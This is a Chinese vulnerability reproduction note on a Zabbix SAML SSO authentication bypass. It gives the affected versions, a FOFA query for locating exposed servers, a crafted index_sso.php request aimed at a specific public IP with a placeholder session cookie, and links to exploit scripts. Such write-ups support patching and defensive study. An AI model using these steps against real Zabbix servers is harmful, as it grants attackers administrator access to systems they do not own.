0x01 漏洞描述
Zabbix对客户端提交的Cookie会话存在不安全的存储方式,导致在启动SAML SSO认证模式的前提下,恶意用户可通过构造特殊请求绕过认证,获取管理员权限。
0x02 受影响的版本
5.4.0 - 5.4.8
6.0.0alpha1
0x03 FOFA语法
app="ZABBIX-监控系统" && body="saml"
0x04 漏洞复现
请求接口,获取session
http://IP/
将session填入cookie中,成功跳转到zabbix.php?action=dashboard.view
GET /index_sso.php HTTP/1.1
Host: 138.68.159.143
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, houzidiandian) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
Cache-Control: max-age=0
Connection: close
Cookie: zbx_session=xxxx
可以使用浏览器插件替换cookie,即可登录后台
http://IP/zabbix.php?action=dashboard.view
脚本验证
脚本地址:https://raw.githubusercontent.com/ad-calcium/vuln_script/main/CVE-2022-23131.py
0x05 参考文章
https://github.com/jweny/zabbix-saml-bypass-exp
https://mp.weixin.qq.com/s/-TAUjvdigi9TzjoPpMe1kw